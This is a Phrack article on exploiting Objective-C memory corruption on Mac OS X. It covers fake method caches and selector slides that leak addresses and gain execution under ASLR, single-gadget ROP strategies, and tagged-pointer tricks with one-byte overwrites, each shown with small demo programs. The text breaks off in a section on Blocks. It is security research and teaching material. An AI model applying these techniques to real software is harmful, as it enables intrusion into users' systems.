Zines/phrack/69/9.txt

                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x09 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------=[ Modern Objective-C Exploitation Techniques ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ by nemo ]=------------------------------=|
|=-----------------------=[ nemo@felinemenace.org ]=---------------------=|
|=-----------------------------------------------------------------------=|

--[ Introduction

Hello again reader. Over the years the exploitation process has obviously
shifted in complexity. What once began with the straight forward case of
turning a single bug into a reliable exploit has now evolved more towards
combining vulnerability primitives together in an attempt to bypass each
of the memory protection hurdles present on a modern day operating system.

With this in mind, let's jump once again into the exploitation of
Objective-C based memory corruption vulnerabilities in a modern time.
Back in Phrack 0x42 (Phile #0x04) I wrote a paper documenting a way to turn
the most common Objective-C memory corruption primitive (an attacker
controlled Objective-C method call) into control of EIP. If you have not
read this paper, or if it's been a while and you need to refresh, it's
probably wise to do so now, as the first half of this paper will only build
on the techniques covered in the original [1]. Contrary to the beliefs of
Ian Beer, the techniques in the original paper are still alive and kicking
in modern times however some adjustment is needed depending on the context
of the vulnerability.

--[ Dangling Objective-C Method Calls

As you're aware since you read my paper in [1], Objective-C method calls
are implemented by passing "messages" to the receiver (object) via the
objc_msgSend() API call.
When Objective-C objects are allocated, storage for their instance
variables is allocated on the native heap with malloc(). The first element
in this space is a pointer to the class definition in the binary. This is
typically referred to as the "ISA" pointer. As in: "an NSString 'IS-A'
NSObject".

When dealing with bugs in Objective-C applications it is extremely common
for this ISA pointer to be attacker controlled, resulting in an Objective-C
method call to be performed on an attacker controlled memory location.
This can occur when dealing with Use-After-Free conditions, heap overflows
into objective-c objects, and even format bugs using the %@ format string
character.

In my original paper [1] I wrote about how to utilize this construct to
perform a successful cache lookup for the selector value, resulting in
control of EIP. An alternative route to gain EIP control is to make the
Objective-C runtime think that it's finished looking through the entire
cache and found no match for the SEL value passed in. In which case the
runtime will attempt to resolve the method's address via the class
definition (through the controlled ISA pointer) and once again use an EIP
value from memory controlled by us. This method is longer however, and adds
little benefit. But i digress, both of these methods are still completely
valid in the most current version of Mac OS X at this time Mavericks,
(10.10).

While, at the time of the Phrack 0x42 release, this technique was fairly
useful by itself, in modern times EIP/RIP control is only a small victory
and in no way wins the battle of process control. This is due to the fact
that even with direct control of EIP modern NX and ASLR makes it difficult
to know a reliable absolute location in which we can store a payload and
return to execute it.

From what i've seen, the most commonly used technique to bypass this
currently is to combine an EIP control primitive with an information leak
of a .text address in order to construct a ROP chain (returning repeatedly
into the text segment) which either executes the needed functionality,
mprotect()'s some shellcode before executing it, or loads an existing
executable or shared library.

Under the right conditions, it is possible to skip some of these steps
and turn a dangling Objective-C method call into both an information leak
and execution control.

In order to use this technique, we must first know the exact binary version
in use on the target. Thankfully on Mac OS X this is usually pretty easy as
automatic updates mean that most people are running the same binary
version.

The specifics of the technique differ depending on the architecture of the
target system, as well as the location of the particular SEL string which
is used in the dangling method call construct.

Since we are already familiar with 32-bit internals, we will begin our
investigation of dangling objc_msgSend() exploitation with the 32-bit
runtime, before moving on to look at the changes in the new run-time on
64-bit.

--[ 32-bit dangling objc_msgSend()

Firstly, 32-bit processes utilize the old Objective-C runtime, so the
specifics of the internals are identical to what is documented in my
original paper. However, depending on the location of the module
containing the selector string, the technique varies slightly.

----[ 32-bit Shared Region

The shared-region is a mapping which is common to all processes on the
system. The file '/var/db/dyld/dyld_shared_cache_i386' is mapped into this
space. This file is generated by the "update_dyld_shared_cache" utility
during system update, and contains a large selection of libraries which are
commonly used on the system. The .paths files in
"/var/db/dyld/shared_region_roots" dictate which files are contained
within. The order in which each library is added to this file is
randomized, therefore the offset into the file for a particular library
cannot be relied on. Reading the file
'/var/db/dyld/dyld_shared_cache_i386.map' shows the order of these files.

For 32-bit processes, this file is mapped at the fixed address 0x90000000.
At this location there is a structure which described the contents of the
shared region.

This technique, once again, revolves around the ability to control the ISA
pointer, and to point it at a fake class struct in memory. In order to
demonstrate how this works, a small sample Objective-C class was created
(shown below). The complete example of this technique is included at the
end of this paper in the uuencoded files blob.

        [leakme.m]

        #import "leakme.h"

        @implementation leakme
        -(void) log
        {
            printf("lol\n");
        }
        @end

In main.m, we create an instance of this object, and then use sprintf() to
write out a string representation of the objects address, before converting
it back with atol(). This is pretty confusing, but it's basically an easy
way to trick the compiler into giving us a void pointer to the object. Type
casting the object pointer directly will not compile with gcc.

        printf("[+] Class @ 0x%lx\n",l);
        sprintf(num,"%li",l);
        long *ptr = atol(num);
        ...
        printf("[+] Overwriting object\n");
        *ptr = &fc; // isa ptr

By overwriting the ISA pointer with the address of an allocation we
control, we can easily simulate a vulnerable scenario. Obviously in the
real world things are not that easy. We need to know the address of an
allocation which we control. There are a variety of ways this can be
accomplished. Some examples of these are:

- Using a leak to read a pointer out of memory.
- Abusing language weaknesses to infer an address. [2]
- Abuse the predictable nature of large allocations.

However, these concepts are the topic of many other discussions and not
relevant to this particular technique.

As a quick refresher, the first thing the Objective-C runtime does when
attempting to call a method for an object (objc_msgSend()) is to retrieve
the location of the method cache for the object. This is done by
offsetting the ISA pointer by 0x20 and reading the pointer at this
location. To control this cache pointer we use the following structure:

        struct fakecache {
            char pad[0x20];
            long cache_ptr;
        };

In the example code we use a separate allocation for the fakecache struct
and the cache itself. However in a real scenario the address of the cache
itself would most likely be the same address as the fakecache offset by
0x24. This would allow us to use a single allocation, and therefore a
single address, reducing the constraints of the exploit. Also, in a real
world case we could leak the address of the cache_ptr, then subtract 0x20
from it's address. This would allow us to shave 0x20 bytes off of the
buffer we need to control.

Next, objc_msgSend() traverses the cache looking for a cached method call
matching the desired implementation. This is done by iterating through a
series of pointers to cache entries. Each entry contains a SEL which
matches the cached method SEL in the .text segment of the Objective-C
binary. By comparing this SEL value with the SEL value passed to
objc_msgSend() the matching entry can be located and used. Rather than
iterating through every pointer to find the appropriate cache entry each
time however, a mask is applied to the selector pointer. The masked off
bits are then shifted and used as an index into the cache table entry
pointer array. Then after this index is used, each entry is inspected.
This means that multiple entries can have the same index, however it
greatly reduces the search time of the cache. Controlling the mask provides
us with the mechanism we need to create a leak.

Ok, so going back to the mask. In my original Objective-C paper, we set the
mask to 0. This forced the runtime to look directly past the mask
regardless of what value the SEL had. In this case however, we want to
abuse the mask in order to isolate the "randomized" unpredictable bits in
the selector pointer value (SEL).

Below, we can see a "real" SEL value from a 10.10 system, which is located
in the shared_region.

        (lldb) x/s $ecx
        0x90f3f86e: "length"

Since we know that the shared region begins at 0x90000000 we know that
first octet will always be 0x9. We also know that the offset into the page
which contains the SEL will always be the same, therefore the last 3
octets 0x86e will be the same for the binary version we retrieve the SEL
value from. However, we cannot count on the rest of the SEL value being the
same on the system we are running our exploit against.

For the value 0x90f3f86e we can see the bit pattern looks as follows:

          9   0    f    3    f     8    6   e
        1001 0000 1111 0011 1111 1000 0110 1110 : 0x90f3f86e

Based on what we just discussed the mask which would retrieve the bits we
care about looks as follows:

         0    f    f     f   f     0   0    0
        0000 1111 1111 1111 1111 0000 0000 0000 : 0x0ffff000

However, since objc_msgSend() shifts the SEL 2 to the right prior to
applying the mask, we must shift our mask to account for this.

This leaves us with:

         0    3    f    f    f    c    0    0
        0000 0011 1111 1111 1111 1100 0000 0000 : 0x03fffc00

As you remember, objc_msgSend() applies the following calculation to
generate the index into the cache entries:

        index = (SEL >> 2) & mask

Filling in the values for this leaves us with an index like:

        index = (0x90f3f86e >> 2) & 0x03fffc00 == 0x3cfc00

This means that for our particular SEL value the runtime will index
0x3cfc00 * 4 (0xf3f000) bytes forward, and take the bucket pointer from
this location. It will then dereference the pointer and check for a SEL
match at that location. By creating a giant cache slide, containing all
permutations of slide, we can make sure that this location contains the
right value for slide.

In the 32-bit runtime (the old runtime) the cache index is used to retrieve
a pointer to a cache_entry from an array of pointers. (buckets).
In our example code (main.m) we set the buckets array up as follows:

        long *buckets = malloc((CACHESIZE + 1) * sizeof(void *));

However, in a typical exploitation scenario, this array would be part of
the single large allocation which we control.

For each of the buckets pointers, a cache entry must be allocated. In the
example code we can use the following struct for each of these entries:

        struct cacheentry {
                long sel;
                long pad;
                long eip;
        };


Each of these structures must be populated with a different SEL and EIP
value depending on its index into the table. For each of the possible
index values, we add the (unshifted) randomized bits to the SEL base.
This way the appropriate SEL is guaranteed to match after the mask is
applied and used to index the table.

For the EIP value, we can utilize the fact that the string table containing
the SEL string is always going to be relative to the .text segment within
the same binary. The diagram below shows this more clearly.

        ,_______________,<--- Mach-O base address
        |               |
        | mach-o header |
        +---------------+
        |               |<--- SEL in string table, relative to base
        | string table  |    /\ Relative offset
        +---------------+    \/ from SEL to ROP gadgets
        |               |<--- ROP gadget in .text segment
        | .text segment |
        '---------------'

For each possible entry in the table, the EIP value must be set to the
appropriate address relative to the SEL value used. The quickest way i know
to calculate these values is to break on the objc_msgSend function and dump
the current SEL value. In lldb this is simple a case of using "reg read
ecx". Next, "target module list -a $ecx" provides us with the module base.
By subtracting the absolute SEL address from the module base we can get the
relative offset within the module. This can be repeated for the gadget
address within the same module. Next, when populating the table, we simple
need to add these two relative offsets to our potential module base
candidate. We increment the module base candidate for each entry in the
table.

By populating our cache slide in this way we are guaranteed the execution
of a single ROP gadget within the module that our SEL is in. This can be
enough for us to succeed. We will look into ways to use this construct
later.

Obviously the allocation used for this 32-bit technique is very large. To
calculate the size of the cache slide which we need to generate we need to
look at the size of the shared region. The shared region always starts at
0x90000000, but the first module inside the shared region starts at
0x90008000. The end of the shared region depends on the number of modules
loaded in the shared region. On the latest version of Mac OS X at this
time, the end of the shared region is located at 0x9c391000. The bit
patterns for these are shown below.

10010000 00000000 10000000 00000000 :: SR START -- 0x90008000
10011100 00111001 00010000 00000000 :: SR END   -- 0x9C391000

00001111 11111111 11110000 00000000 :: MASK UNSHIFTED

If we compare this to the unshifted mask, and mask off the bits we care
about we get the following values for our potential index values.

00000000 00000000 00100000 00000000  -- smallest index value - 0x2000
00000011 00001110 01000100 00000000  -- biggest  index value - 0x30E4400

Since the buckets array is an array of 4 byte pointer values we can
multiple the largest index by 4, giving us 0xc391000. Each cache entry
pointed to by a bucket is 12 bytes in size. This means that the size of the
cache entry array is 0x24ab3000.

By adding these two values together we get the total size of our cache
slide, 0x30e44000 bytes.

Allocations of this size can be difficult to make depending on the target
application. However, also due to the size, they are predictably placed
within the address space. This buffer can be made from JavaScript for
example.

----[ Uncommon 32-bit Libraries

Libraries which are not contained within the shared region are mapped in by
the linker when an executable is loaded that requires them as a dependency.

The location of these modules is always relative to the end of the
executable file and is loaded in the order specified in the LC_LOAD_DYLIB
header.

When loading the executable file, the kernel generates a randomized slide
value for ASLR. This value is added to the desired segment load addresses
in the executable (if it's compiled with PIE) and then the executable is
re-based to that location.

        uintptr_t requestedLoadAddress = segPreferredLoadAddress(i) +
            slide;

The slide value is calculated by the kernel and then passed to the main
function of the dynamic loader. The following algorithm is responsible for
generating the slide value.

        aslr_offset = (unsigned int)random();
        max_slide_pages = vm_map_get_max_aslr_slide_pages(map);
        aslr_offset %= max_slide_pages;
        aslr_offset <<= vm_map_page_shift(map);

where:

        uint64_t
        vm_map_get_max_aslr_slide_pages(vm_map_t map)
        {
                return (1 << (vm_map_is_64bit(map) ? 16 : 8));
        }


        int
        vm_map_page_shift(
                vm_map_t map)
        {
                return VM_MAP_PAGE_SHIFT(map);
        }

        #define VM_MAP_PAGE_SHIFT(map) \
            ((map) ? (map)->hdr.page_shift : PAGE_SHIFT)
        #define PAGE_SHIFT I386_PGSHIFT
        #define I386_PGSHIFT 12

So for example, a random() value of 0xdeadbeef, would end up as the value
0xef000. With the following calculation:

        slide = ((0xdeadbeef % (1<<8)) << 12)
        slide = 0xef000

The gcc compiler and llvm both (by default) use a load address of 0x1000
for the text section of an executable. So for the slide value 0xef000 the
executable file would be based at 0x1000 + 0xef000 = 0xf0000.

This means that for the most part, you're dealing with roughly 1 byte of
unpredictable bits. Depending on the number of libraries loaded which are
outside of the shared region, this fluctuates, however libraries are always
loaded in the order stipulated by the executable itself, so this is fairly
predictable.

For our dangling objc_msgSend technique this means that our mask fluctuates
depending on the target. In the best case, masking of the single byte in
the address can be achieved by using the mask (0x000ff000 >> 2) == 0x3fc00.

--[ 64-bit dangling objc_msgSend()

The 64-bit version of this technique is quite different to it's 32-bit
brethren. This is mostly due to the fact that 64-bit processes use a
brethren. This is mostly due to the fact that 64-bit processes use a
whole new version of the runtime.

In the new runtime, the objc_class structure is no longer a basic C
structure. Instead it uses C++ intrinsics to include methods.

The memory footprint for the new class is shown below.

struct objc_class : objc_object {
    // Class ISA;
    Class superclass;
    cache_t cache;             // formerly cache pointer and vtable
    class_data_bits_t bits;    // class_rw_t * plus custom rr/alloc flags
...
}

The cache_t struct looks as follows:

struct cache_t {
    struct bucket_t *_buckets;
    mask_t _mask;
    mask_t _occupied;
...
}

and a bucket_t struct looks like:

struct bucket_t {
private:
    cache_key_t _key;
    IMP _imp;
...
}

Putting this together. The main thing that has changed regarding the cache
lookup, rather than an array of pointers to cache entries, there is simply
a single pointer to an array of SEL + method address entries at offset 0x10
into the structure. Following this, there's the mask, followed by an
occupied field indicating that entries in the cache exist.

The critical difference in the run-time is the way the mask is used to
index into this table. Rather than the (SEL >> 2) value in the 32-bit
runtime, the index is calculated via ((SEL & mask) << 4). This means, if we
were to abuse the mask in a similar way to the 32-bit technique we would
need a mask of 0xffff0000 in order to isolate the randomized bits.
Obviously even if we were able to make an allocation big enough to contain
the cache slide necessary for this it would be such a time consuming act to
populate 4gb worth of cache entries to catch the index that this is not
really a feasible process.

Instead we must utilize an additional characteristic of the new runtime.
The objc_msgSend() call at a high level looks as follows:

        ISA = *class_ptr;
        offset = ((SEL & ISA->mask) << 4);

        while(ISA->buckets[offset].SEL != 0) {
                if(ISA->buckets[offset].SEL == SEL) {
                        return ISA->buckets[offset].method(args);
                } else {
                        offset--;
                        continue;
                }
        }

This means that if we once again create a large slide containing entries
for all possible randomized bits, we simply need to point (using the index
we control) the runtime to end of our slide, and let it walk backwards
until it finds a match.

----[ 64-bit Shared Region

In order to investigate this technique, we will begin again by looking at
the shared region on 64-bit processes. The shared region starts at the
address 0x7FFF80000000. Once again a cache file is mapped in, this time
from /var/db/dyld/dyld_shared_cache_x86_64. This file is, once again,
randomized upon creation, however in 64-bit processes there is also a
random slide added to the file when it is mapped in. This is calculated
using sizeof(shared_region) - sizeof(cache file) as the max. As far as our
technique goes however this does not really change very much.

Calculating the mask value for this technique can be challenging. There are
a few constraints which we must work against in order to index our bucket
list to the last entry.

To investigate this we will take a typical SEL value 0x00007fff99f88447
The bit pattern is broke down below.

SEL:
 0x00       00       7f       ff       99       f8       84       47
00000000 00000000 01111111 11111111 10011001 11111000 10000100 01000111

Unfortunately the mask variable is only 4 bytes long. This means that the
predictable bits in the upper 32-bits of the SEL are not available to us.
Also, the last 12 static bits (offset into page - 0x447) would result in an
index that is too small. If we used those bits we would not have a large
enough offset to index to the end of the slide. Luckily, we have one single
static bit in position 33 which we can count on being set. We can take
advantage of this bit with the following mask.

Mask:
 0x00       00       00       00       80       00       00       00
00000000 00000000 00000000 00000000 10000000 00000000 00000000 00000000

Applying this bit to any SEL value within the shared region will guarantee
the offset 0x80000000. Clearly this value is way beyond the end of our
required slide, however since we also control the pointer to the bucket
slide, we can subtract (0x80000000 - sizeof(cache)) from the pointer value
to force it to point to the right location.

The example code main64.m demonstrates this technique. In this code, we use
a fakecache structure to control the initial cache lookup. A pad is used to
correctly position the bucket pointer and mask.

        struct fakecache {
           char pad[0x10];
           long bucketptr;
           long mask;
        };

Next, we allocate an array of cache entry structs in order to hold our SEL
slide. Obviously in a real attack all these elements would be in a single
allocation, however for this example we will split them up for clarity.

        struct cacheentry {
                long sel;
                long rip;
        };

        struct cacheentry *buckets = malloc((NUMBUCKETS+1) * sizeof(struct
        cacheentry));

Initializing each of these elements is simply a case of incrementing the
random value added to the SEL each time, and populating each entry.

Again, the RIP value is calculated by adding a relative offset to the SEL
in order to locate our ROP gadget.

        for(slide = 0; slide < NUMBUCKETS ; slide++) {
                buckets[slide].sel = BASESEL + (slide * 0x1000);
                buckets[slide].rip = buckets[slide].sel - 75654446;
        }

----[ Uncommon 64-bit Libraries

Once again, libraries which are not within the shared region are mapped
directly after the executable image in memory. Typically the text segment
address generated by the compiler is 0x100000000.

The same code is used to to generate the slide that we looked at earlier in
the 32-bit section. Here is an example of a slide for a 64-bit process with
the random() value of 0xdeadbeef.

        slide         = ((0xdeadbeef % (1<<16)) << 12)
        slide         = 0xbeef000
        example SEL   = 0x10beef447

As you can see, in this example, there is no predictable bit in the lower
32-bits of the SEL which we can rely on to index to the end of our table.
Our only option here is to utilize the random bits in the SEL. We can do
this by repeating the entire spectrum of randomized values in our slide
multiple times. This way depending on the value of the random bits a
different offset will occur into the slide, however in most scenarios it
will result in finding one instance of the correct entry.

--[ Single Gadget Exploitation Strategies

Now that we've looked at how to get execution to a predictable location of
our choice, the next step is to look at some ways to utilize this to our
advantage.

Obviously there is an abundance of ways that this can be utilized, but the
following 3 methods are ways that I have seen succeed in real life.

----[ Return SEL Gadget

At the moment when we gain execution control using this technique a
register value contains the SEL pointer value. We can use this fact to our
advantage. For example, for 32-bit code, the following gadget could take
advantage of this.

                00000000  89C8              mov eax,ecx
                00000002  5E                pop esi
                00000003  5D                pop ebp
                00000004  C3                ret

The gadget above moves the SEL pointer value into the eax register,
obviously on function return this register is treated as the return value.
Next it restores EBP from the stack and uses the ret instruction to return
from the function. This results in, rather than the expected return value
for whatever Objective-C method was dangling, the SEL value is returned.

This is only a useful approach if we are able to retrieve the value from
this context and utilize it to re-trigger the bug. In the example code
provided, the use of this gadget causes the SEL value to be printed, rather
than the length of the NSString which is intended. You can see the result
of this below.

        -[nemo@objcbox:code]$ ./leak
        [+] buckets is 0x10000000 size.
        [+] cacheentry is 0x30000000 size.
        [+] Setting up buckets
        [+] Done
        [+] Class @ 0x78622240
        [+] Overwriting object
        [+] Calling method
        String length: 0x93371b88

Likewise, in some cases it may not make sense to return the SEL directly.
If it is not possible to retrieve the leaked value upon return it may make
more sense to execute a gadget which writes ecx somewhere in memory. For
example in a web browser context, writing the ecx register into a
JavaScript array which is attacker controlled may result in the ability to
"collect" this value from JavaScript context and re-trigger the bug.

----[ Self Modifying ROP

Another potential use of the single gadget execution primitive is to use
the ecx register containing SEL to modify the rest of a ROP chain prior to
pivoting to use it.

I have never personally been successful with this, however I have seen this
done in a friends exploit.

Finding a gadget which accomplishes all this is extremely challenging.

----[ Arbitrary Write Gadget

The final method for using a single gadget to continue the exploitation
process is to turn the execution primitive into an arbitrary write
primitive.

It is usually fairly straight forward to find a gadget which allows you to
write any high value to a fixed location. By positioning something at this
location (eg 0x0d0d0d0d) this single write can be leveraged to escalate the
available functionality. For example, in a web context. Positioning a
JavaScript array or string at this location then writing to the length
field can be enough to gain an arbitrary read/write primitive from
JavaScript. This is easily enough to finish the exploitation process.

Outside of the browser context there are still a variety of length encoded
data types which can be used for this. Specifically to Objective-C, the
NSMutableArray/NSArray classes work this way.

--[ Tagged Pointers

One of the new features added to the Objective-C runtime is the usage of
"tagged pointers" to conserve resources. Tagged pointers take advantage of
the fact that the system memory allocator will align pointers handed out on
natural alignment boundaries. This means that the low bit will never be
set.

        (lldb) print (long)malloc_good_size(1)
        (long) $0 = 16

The runtime takes advantage of this lower bit in order to indicate that the
pointer value is not to be treated as a regular pointer, and instead, bits
61-63 are used as an index into a table of potential ISA pointers,
registered with the system. This means the first 60 bits can then by used
to store the object payload itself inline.

        Tagged pointer layout

11111111 11111111 11111111 11111111 11111111 11111111 11111111 1111[111][1]
                                                                     |   |
                                                                     |  tag
                                                                   index

As mentioned, index bits index into a table of potential object types. The
default types registered with the runtime is shown below.

    OBJC_TAG_NSAtom            = 0,
    OBJC_TAG_1                 = 1,
    OBJC_TAG_NSString          = 2,
    OBJC_TAG_NSNumber          = 3,
    OBJC_TAG_NSIndexPath       = 4,
    OBJC_TAG_NSManagedObjectID = 5,
    OBJC_TAG_NSDate            = 6,
    OBJC_TAG_7                 = 7

It is possible for a developer to add their own types to the table, however
it is very uncommon for anyone to do this. The guide at [3] clearly
illustrates the mechanics of tagged pointers, if you require more
information.

Now that we've looked at how tagged pointers work, we will investigate some
of them from an exploitation perspective.

----[ Tagged NSAtom

NSAtom is an extremely handy object type for exploitation. In order to use
a tagged NSAtom, we simply need the low bit set indicating a tagged
pointer, and then no bits set in the index bits. The value 0x1 by itself
for example will satisfy this. The beautiful thing about the NSAtom class
is that calling any method name on this class will result in success.

The example code below simply calls the method initWithUTF8String on the
object 0x1. Clearly this is not a valid pointer, and instead is treated as
an NSAtom. Any method name could be used and the result would still be 1.

int main(int argc, const char * argv[])
{
        printf("[+] NSAtom returned: %u\n",[1 initWithUTF8String:"lol"]);
        return 0;
}

$ ./nsatom
[+] NSAtom returned: 1

As you can imagine, this behavior can be extremely useful for
CoE or general exploitation. An example scenario would be, if you are
forced to write through several Objective-C object pointers on the path to
an overwrite target, any method call on those objects would require valid
pointers/fake object setup. However with the NSAtom tagged pointer type,
simply replacing these pointers with the value 0x1 can be enough to stop
the crash and take advantage of the overwrite target.

Also, in extremely specific cases, the fact that this object returns true
can be used to manipulate the path of the program.

----[ Tagged NSString

The next tagged pointer type we will investigate is the tagged NSString.
With the new runtime, when a NSString is created, the size of the string
during initialization dictates the type of storage for the string.

String which are greater than 7 bytes in length are stored on the heap in a
typical Objective-C NSString object. However, for strings of 7-bytes or
less, a tagged pointer with the index 2 is used. The bitpattern for a
tagged NSString is shown below. It is comprised of 7 bytes of string data,
followed by 4 bits for the length, 3-bit for the index into the tagged
pointer types array and finally the low bit to indicate tagged pointer
type.

<-------------------[ String Data ]-------------------->
11111111111111111111111111111111111111111111111111111111[1111][010][1]
                                                [strlen]<---->  |   |
                                                                |  tag
                                                         index: 02

The first scenario in which we can abuse the properties of a tagged
NSString is a partial overwrite into an untagged NSString. The example code
included with this paper (nsstring1.m) demonstrates this.

In this code (shown below) we create an NSString (s) using the C string
contents "thisisaverylongstringnottagged". Since this is not 7 or less
bytes in length this string is stored on the heap, and the object pointer
points to this.

We use the character pointer (ptr) to simulate a 1 byte write into the
least significant byte of the object pointer. This condition can occur from
either a controlled overflow, or an actual 1 byte off-by-one.

We write the value 0xf5 to this byte, and then print the length and
contents of the string.

int main(int argc, const char * argv[])
{
        NSString *s = [[NSString alloc]
initWithUTF8String:"thisisaverylongstringnottagged"];
        char *ptr = (char *)&s;
        *ptr = 0xf5; // NSString Tagged

        printf("[+] NSString @ 0x%lx\n",(unsigned long)s);
        printf("[+] String length: 0x%lx\n",(unsigned long)[s length]);
        NSLog(@"%@",s);

        return 0;
}

The value 0xf5 in the least significant byte has the following bit pattern:

        [1111][010][1]

As you can see, this leaves us with a string length of 0xf, an index of 0x2
and the LSB set to indicate a tagged pointer.

By only using a partial overwrite, we have left the first 7 bytes of the
pointer untouched.

As you can see from the output below, the length of the string is 0xf (15)
after this overwrite. This means that when the NSLog() attempts to print
the string contents, 15 bytes of data are pulled out starting from the
inline data. This leaks the address of the object. If our target allows us
to retrieve a string value and use it, we can turn a one byte overwrite
into an info leak primitive.

        $ ./nsstring1
        [+] NSString @ 0x7fc0db4116f5
        [+] String length: 0xf
        2015-04-04 07:47:26.815 nsstring1[13335:92489992] eeeeeee 3eIjuaj


The next scenario which we will investigate involves overflowing into a
tagged NSString, rather than an un-tagged variant. The example code
nsstring2.m demonstrates this.

In this code, we initialize an NSString with the contents "AAAAAAA". Since
this is only 7 bytes of c-string it guarantees that the NSString will be a
tagged type. This means it will contain the value:

        0x4141414141414175

Essentially the first 7 bytes are taken up with our "A" contents. The last
byte contains the length (7) followed by the bitpattern to indicate
NSString type of tagged pointer.

Next, we once again simulate a single byte overflow into the object
pointer. This time we write the value 0x00, which is a common primitive in
real life due to off-by-one string operations. This forcefully unsets the
tagged LSB in the pointer, turning the tagged string into an un-tagged
type.

Finally we call the length method on the object.

int main(int argc, const char * argv[])
{
        NSString *s = [[NSString alloc] initWithUTF8String:"AAAAAAA"];
        char *ptr = (char *)&s;
        *ptr = 0x00; // un-tag

        printf("[+] NSString @ 0x%lx\n",(unsigned long)s);
        printf("[+] String length: 0x%lx\n",(unsigned long)[s length]);
        NSLog(@"%@",s);

        return 0;
}

As you can imagine, the runtime now treats our tagged object as untagged.
This means that the tagged pointer is now treated as a real pointer. If we
were able to control the contents of the NSString on initialization, this
would present us with direct control over the object cache lookup, allowing
us to use the construct presented earlier in the paper to turn this into
code execution.

(lldb) r
Process 13636 launched: './nsstring2' (x86_64)
[+] NSString @ 0x4141414141414100
Process 13636 stopped
* thread #1: tid = 0x5834fc3, 0x00007fff96c210d7
  libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread', stop
reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
    frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23
libobjc.A.dylib`objc_msgSend + 23:
-> 0x7fff96c210d7:  andq   (%rdi), %r11
   0x7fff96c210da:  movq   %rsi, %r10
   0x7fff96c210dd:  andl   0x18(%r11), %r10d
   0x7fff96c210e1:  shlq   $0x4, %r10
(lldb) reg read rdi
     rdi = 0x4141414141414100

----[ Tagged NSNumber

As you can imagine, the NSNumber case is very similar to that of the
NSString. Any number value which can be contained in the first 7 bytes of
the pointer is stores inline as a tagged NSNumber, rather than performing
an allocation and storing the number on the heap.

The sample code nsnumber1.c demonstrates,once again, a single byte
overwrite into a tagged pointer, containing an inline nsnumber.

In this code, we begin by instantiating an NSNumber containing the value
0xdeadbeeffeedface. The contents of this number are unimportant, however
clearly the number is large enough that it would not fit into the upper
bytes of a tagged pointer, therefore this NSNumber is stored on the heap in
typical Objective-C fashion.

Next, we write the value 0xf7 to the lower byte of the object pointer. Once
again this converts the un-tagged object pointer into a tagged type, while
leaving the upper bits in-tact. Finally, we log the contents of the number
using the method unsignedLongLongValue.

int main(int argc, const char * argv[])
{
        NSNumber *n = [NSNumber numberWithInteger:0xdeadbeeffeedface];
        char *ptr = (char *)&n;
        *ptr = 0xf7;

        NSLog(@"0x%lx\n",(unsigned long)[n unsignedLongLongValue]);
        return 0;
}

As you can see from the output below, rather than printing the initialized
contents (0xdeadbeeffeedface) the NSLog call displays the object pointer
value itself, once again creating an information leak of this value.

$ ./nsnumber1
2015-04-04 09:26:58.701 nsnumber1[14663:92514549] 0x7fd6134116

The final tagged pointer example nsnumber2.m demonstrates the counter case
to this. In this code an NSNumber is instantiated containing the value
0x0041414141414141. As you can see from the leading NULL byte, this value
is small enough that it fits within the first 7 bytes of the object
pointer. Therefore, this object is created as a tagged pointer with the
value:

        0x4141414141414107

We once again truncate the final byte using a character pointer, removing
the tagged bit before calling a method on it (unsignedLongLongValue).

int main(int argc, const char * argv[])
{
        NSNumber *n = [NSNumber numberWithInteger:0x0041414141414141];
        char *ptr = (char *)&n;
        *ptr = 0x00;

        NSLog(@"0x%lx\n",(unsigned long)[n unsignedLongLongValue]);
        return 0;
}

When the method call is made, the runtime treats the numbers contents as a
pointer, and leaves us with a dangling Objective-C message send call, which
we can once again abuse to control execution.

Process 14636 launched: './nsnumber2' (x86_64)
Process 14636 stopped
* thread #1: tid = 0x583a67f, 0x00007fff96c210d7
  libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread', stop
reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
    frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23
libobjc.A.dylib`objc_msgSend + 23:
-> 0x7fff96c210d7:  andq   (%rdi), %r11
   0x7fff96c210da:  movq   %rsi, %r10
   0x7fff96c210dd:  andl   0x18(%r11), %r10d
   0x7fff96c210e1:  shlq   $0x4, %r10
(lldb) reg read rdi
     rdi = 0x4141414141414100

----[ Additional Tagged Types

The additional types in the table have very unique properties. I will leave
it as an exercise to the reader to investigate each of these types for
useful ways they can be used from an exploitation perspective.

--[ Blocks

So, Apple being Apple, decided the tried and tested C standard wasn't good
enough for their magical super fantastic operating system and went ahead
and modified it. They did this by adding a new construct called Blocks.

For anyone familiar with the concept of an anonymous function reference in
Perl, or a lambda function in Python, this is essentially what a Block is.
You can read about blocks in detail in Apple's guide [4]. TL;DR though, a
block basically uses the "^" operator to declare a special type of function
pointer where the body of the function can be defined inline. This is
mostly a syntactic feature, but has a few runtime uses as well. They can be
passed to other functions just like a function pointer, and can access
global data, or data relative to the current executing state they are
defined in. Syntactically blocks are very similar to ecmascript Closures,
however internally they function a little differently as you'll see.

--[ Sample Block Code

Ok let's take a look at how Blocks are defined. Apple's guide [4] provides
the following little example code:


        int main(int ac, char **av)
        {
                int multiplier = 7;

                int (^myBlock)(int) = ^(int num) {

                    return num * multiplier;

                };

                printf("%d\n", myBlock(3));
        }

As you can see, this code defines a block called myBlock which takes an
integer argument "num" and multiplies it with a value "multiplier" taken
from the stack of the main function where the block was declared.

The myBlock Block is then called passing the value 3. As expected when
executed the block is entered and returns the multiplication of 7 * 3.

-[dcbz@squee:~/code/blocks]$ gcc block.c -o block
-[dcbz@squee:~/code/blocks]$ ./block
21

Note, nothing fancy is needed to compile this, Apple's built in compiler
supports Blocks out of the box.

At first glance, i expected this feature to be syntactical only. I thought
the compiler would create a function, and then just add a single call
instruction in the appropriate places. Or maybe a function pointer if
reassignment was required. However if we walk through the assembly listing
for this trivial program we can see that is not even close to the case.

First we have the basic function prologue as expected...

EntryPoint:
       push       rbp                           ; XREF=0x100000e2f
       mov        rbp, rsp
       sub        rsp, 0x50

Next argv/argc are moved into stack variables.

       mov        rax, rsi
       mov        ecx, edi
       mov        dword [ss:rbp-0x50+var_76], ecx
       mov        qword [ss:rbp-0x50+var_64], rax

